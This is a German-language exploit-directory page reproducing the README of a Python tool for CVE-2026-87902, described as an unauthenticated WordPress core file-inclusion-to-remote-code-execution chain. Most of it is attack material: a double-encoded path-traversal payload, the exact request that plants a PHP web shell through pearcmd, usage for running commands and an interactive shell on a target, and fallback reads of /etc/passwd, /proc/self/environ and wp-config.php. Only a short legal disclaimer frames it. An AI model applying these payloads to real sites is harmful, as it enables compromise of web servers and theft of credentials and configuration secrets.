Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-87902 — Python-Exploit für CVE-2026-87902, eine WordPress-Core-LFI-zu-RCE-Kette. Fingerprintet Versionen, schreibt eine PHP-Shell über pearcmd und bietet Kommandoausführung oder LFI-Fallback. | Kitploit
Tools/GitHubGitHub/zyphorixofficialmain-lab/cve-2026-87902
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPost-ExploitationWebsicherheitPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubzyphorixofficialmain-lab/cve-2026-87902

cve-2026-87902

Python-Exploit für CVE-2026-87902, eine WordPress-Core-LFI-zu-RCE-Kette. Fingerprintet Versionen, schreibt eine PHP-Shell über pearcmd und bietet Kommandoausführung oder LFI-Fallback.

Repository anzeigen
1vor 12h 53mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

cve-2026-87902

CVE-2026-87902 – WordPress Core LFI zu RCE Exploit (Auto-Forcing Edition)

erstellt von alfaris

⚠️ RECHTLICHER HINWEIS Die Verwendung gegen Systeme, die Ihnen nicht gehören oder für die Sie keine schriftliche Testgenehmigung haben, ist illegal und nach Cyberkriminalitätsgesetzen strafbar. Der Autor übernimmt keine Verantwortung für Missbrauch.


📌 Zusammenfassung der Schwachstelle

FeldWert
CVECVE-2026-87902
TypLocal File Inclusion (LFI) → Remote Code Execution (RCE)
CWECWE-98
CVSS v3.19.2 (Kritisch)
AngriffsvektorNetzwerk (Nicht authentifiziert)
BetroffenWordPress 4.7.0 – 7.1.1
GepatchtWordPress 7.1.2 (und Backports bis 4.7.37)
Ursacheget_page_template() ruft validate_file() nicht auf, nachdem der pagename-Parameter URL-dekodiert wurde, wodurch doppelt kodierte Traversierung (%252E%252E%252F) die Bereinigung umgehen und beliebige .php-Dateien außerhalb des Theme-Verzeichnisses eingebunden werden können.

RCE-Voraussetzungen

Für vollständiges RCE müssen alle folgenden Bedingungen erfüllt sein:

  1. WordPress-Version zwischen 4.7.0 und 7.1.1
  2. Aktives Theme enthält ein Top-Level-page-*-Verzeichnis (z. B. page-templates/)
  3. Mindestens eine veröffentlichte Seite existiert
  4. pearcmd.php ist vorhanden und für den Webserver-Benutzer lesbar (Standard in offiziellen PHP-Docker-Images und vielen cPanel-Installationen mit PHP < 8.5)
  5. PHP hat register_argc_argv=On (Standard in PHP < 8.5)
  6. Host-Betriebssystem ist Linux (Windows-Traversierungssyntax unterscheidet sich)

Wenn eine dieser Bedingungen fehlt, fällt der Exploit auf LFI-only-Dateilesen zurück.


📂 Dateien

exploit.py # Haupt-Exploit-Skript README.md # Diese Datei report.json # (optional) Ausgabebericht bei Verwendung von -o

⚙️ Anforderungen

  • Python 3.8+
  • requests-Bibliothek

Installation:

root@kitploit:~
apt update
apt upgrade
apt install python
apt install git
root@kitploit:~
pip install requests
root@kitploit:~
git clone https://github.com/zyphorixofficialmain-lab/cve-2026-87902
cd cve-2026-87902
  1. Basis-Scan (verbose)
root@kitploit:~
python3 exploit.py -t https://site.com -v

Dies wird:

· WordPress-Version und aktives Theme fingerprinten · Verwundbaren Versionsbereich verifizieren · Eine veröffentlichte Seiten-ID lokalisieren (REST → Sitemap → Brute Force) · Versuchen, eine PHP-Shell über pearcmd.php zu schreiben · Versuchen, die Shell einzubinden und id auszuführen · Bei fehlgeschlagenem RCE auf LFI bei sensiblen Dateien zurückfallen

  1. Einen einzelnen Befehl ausführen
root@kitploit:~
python3 exploit.py -t https://site.com -c "id"
  1. Interaktive Shell (nur wenn RCE erfolgreich war)
root@kitploit:~
python3 exploit.py -t https://site.com -i -v

Innerhalb der Shell:

root@kitploit:~
wp$ id
wp$ uname -a
wp$ cat /etc/passwd
wp$ exit
  1. Bericht als JSON speichern
root@kitploit:~
python3 exploit.py -t https://site.com -o report.json -v
  1. Optionen kombinieren
root@kitploit:~
python3 exploit.py -t https://site.com -c "whoami" -o report.json -v

🧾 CLI-Referenz

Flag Lang Beschreibung -t --target Erforderlich. Ziel-WordPress-URL (ohne abschließenden Schrägstrich). -c --command Einen einzelnen Shell-Befehl nach RCE ausführen. -i --interactive Eine interaktive Shell nach RCE öffnen. -v --verbose Detaillierten Fortschritt ausgeben. -o --output Den finalen Bericht als JSON unter dem angegebenen Pfad speichern. -h --help Hilfe anzeigen.

🔄 Exploit-Ablauf

root@kitploit:~
[1] Fingerprint
      ├─ WordPress-Version (meta generator / asset ?ver=)
      └─ Aktives Theme (/wp-content/themes/<name>/)

[2] Versionsprüfung
      └─ 4.7.0 – 7.1.1 ? weiter : warnen & weiter

[3] Seiten-ID finden
      ├─ REST: /wp-json/wp/v2/pages
      ├─ Sitemap: /wp-sitemap.xml
      └─ Brute Force: /?page_id=1..30

[4] page-*-Verzeichnis prüfen
      ├─ page-templates
      ├─ page-template
      ├─ pages
      ├─ templates
      └─ page

[5] Shell über pearcmd schreiben
      └─ POST /?+config-create+/&page_id=<id>&pagename=templates%252F..%252F..%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd
         body: root=<?php system($_GET['c']); ?>

[6] Shell einbinden
      └─ GET /?page_id=<id>&pagename=templates%252F..%252F..%252Ftmp%252F<shell>.php&c=id

[7] Fallback LFI (wenn RCE fehlschlägt)
      ├─ /etc/passwd
      ├─ /etc/hostname
      ├─ /proc/self/environ
      ├─ /proc/version
      ├─ wp-config.php
      └─ ../.. Varianten
Tool herunterladen